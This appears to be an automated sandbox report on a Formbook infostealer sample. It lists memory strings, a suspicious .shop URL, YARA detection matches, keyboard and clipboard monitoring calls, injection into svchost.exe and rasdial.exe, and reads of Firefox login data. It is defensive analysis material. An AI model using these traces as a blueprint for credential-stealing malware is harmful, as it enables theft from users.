            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/feed/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006726000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003996000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006A4A000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003CBA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_006F425A
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_006F4458
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_006E0219
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_0070CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0070CDAC

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00683B4C
            Source: 220204-TF1--00.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 220204-TF1--00.exe, 00000000.00000000.1643043566.0000000000735000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1a4ddbe0-3
            Source: 220204-TF1--00.exe, 00000000.00000000.1643043566.0000000000735000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0222151d-6
            Source: 220204-TF1--00.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_82e61f36-a
            Source: 220204-TF1--00.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0504a556-f
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C1A3 NtClose, 1_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572B60 NtClose,LdrInitializeThunk, 1_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035735C0 NtCreateMutant,LdrInitializeThunk, 1_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03574340 NtSetContextThread, 1_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03574650 NtSuspendThread, 1_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572BF0 NtAllocateVirtualMemory, 1_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572BE0 NtQueryValueKey, 1_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572B80 NtQueryInformationFile, 1_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572BA0 NtEnumerateValueKey, 1_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572AD0 NtReadFile, 1_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572AF0 NtWriteFile, 1_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572AB0 NtWaitForSingleObject, 1_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572F60 NtCreateProcessEx, 1_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572F30 NtCreateSection, 1_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572FE0 NtCreateFile, 1_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572F90 NtProtectVirtualMemory, 1_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572FB0 NtResumeThread, 1_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572FA0 NtQuerySection, 1_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572E30 NtWriteVirtualMemory, 1_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572EE0 NtQueueApcThread, 1_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572E80 NtReadVirtualMemory, 1_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572EA0 NtAdjustPrivilegesToken, 1_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572D10 NtMapViewOfSection, 1_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572D00 NtSetInformationFile, 1_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572D30 NtUnmapViewOfSection, 1_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572DD0 NtDelayExecution, 1_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572DB0 NtEnumerateKey, 1_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572C60 NtCreateKey, 1_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572C00 NtQueryInformationProcess, 1_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572CC0 NtQueryVirtualMemory, 1_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572CF0 NtOpenProcess, 1_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572CA0 NtQueryInformationToken, 1_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03573010 NtOpenDirectoryObject, 1_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03573090 NtSetValueKey, 1_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035739B0 NtGetContextThread, 1_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03573D70 NtOpenThread, 1_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03573D10 NtOpenProcessToken, 1_2_03573D10
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04F64650 NtSuspendThread,LdrInitializeThunk, 6_2_04F64650
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04F64340 NtSetContextThread,LdrInitializeThunk, 6_2_04F64340
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04F62CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_04F62CA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04F62C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_04F62C70
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_04F62C60 NtCreateKey,LdrInitializeThunk, 6_2_04F62C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04F62DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DD0 NtDelayExecution,LdrInitializeThunk,6_2_04F62DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04F62D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04F62D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04F62EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04F62E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FE0 NtCreateFile,LdrInitializeThunk,6_2_04F62FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FB0 NtResumeThread,LdrInitializeThunk,6_2_04F62FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F30 NtCreateSection,LdrInitializeThunk,6_2_04F62F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AF0 NtWriteFile,LdrInitializeThunk,6_2_04F62AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AD0 NtReadFile,LdrInitializeThunk,6_2_04F62AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04F62BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04F62BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04F62BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62B60 NtClose,LdrInitializeThunk,6_2_04F62B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F635C0 NtCreateMutant,LdrInitializeThunk,6_2_04F635C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F639B0 NtGetContextThread,LdrInitializeThunk,6_2_04F639B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62CF0 NtOpenProcess,6_2_04F62CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62CC0 NtQueryVirtualMemory,6_2_04F62CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62C00 NtQueryInformationProcess,6_2_04F62C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62DB0 NtEnumerateKey,6_2_04F62DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62D00 NtSetInformationFile,6_2_04F62D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62EA0 NtAdjustPrivilegesToken,6_2_04F62EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62E30 NtWriteVirtualMemory,6_2_04F62E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62FA0 NtQuerySection,6_2_04F62FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F90 NtProtectVirtualMemory,6_2_04F62F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62F60 NtCreateProcessEx,6_2_04F62F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62AB0 NtWaitForSingleObject,6_2_04F62AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F62B80 NtQueryInformationFile,6_2_04F62B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63090 NtSetValueKey,6_2_04F63090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63010 NtOpenDirectoryObject,6_2_04F63010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63D70 NtOpenThread,6_2_04F63D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F63D10 NtOpenProcessToken,6_2_04F63D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28FF0 NtDeleteFile,6_2_02F28FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28F00 NtReadFile,6_2_02F28F00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F28DA0 NtCreateFile,6_2_02F28DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F29090 NtClose,6_2_02F29090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F291E0 NtAllocateVirtualMemory,6_2_02F291E0
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_006E4021
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006D8858
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006E545F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03587E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0352B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035BF290 appears 103 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04FAF290 appears 103 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04F65130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04F1B970 appears 262 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04F9EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04F77E54 appears 107 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: String function: 006A8B40 appears 42 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: String function: 006A0D27 appears 70 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: String function: 00687F41 appears 35 times
            Source: 220204-TF1--00.exe, 00000000.00000003.1673037949.00000000039FD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 220204-TF1--00.exe
            Source: 220204-TF1--00.exe, 00000000.00000003.1673398150.0000000003853000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 220204-TF1--00.exe
            Source: 220204-TF1--00.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/14
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EA2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006D8713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_006DDA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Code function: 0_2_00684FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\220204-TF1--00.exe File created: C:\Users\user\AppData\Local\Temp\autD149.tmp
            Source: 220204-TF1--00.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: rasdial.exe, 00000006.00000002.4129935953.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2207130112.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2207220953.00000000031C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 220204-TF1--00.exe ReversingLabs: Detection: 28%
            Source: 220204-TF1--00.exe Virustotal: Detection: 30%
            Source: unknown Process created: C:\Users\user\Desktop\220204-TF1--00.exe "C:\Users\user\Desktop\220204-TF1--00.exe"
            Source: C:\Users\user\Desktop\220204-TF1--00.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\220204-TF1--00.exe"
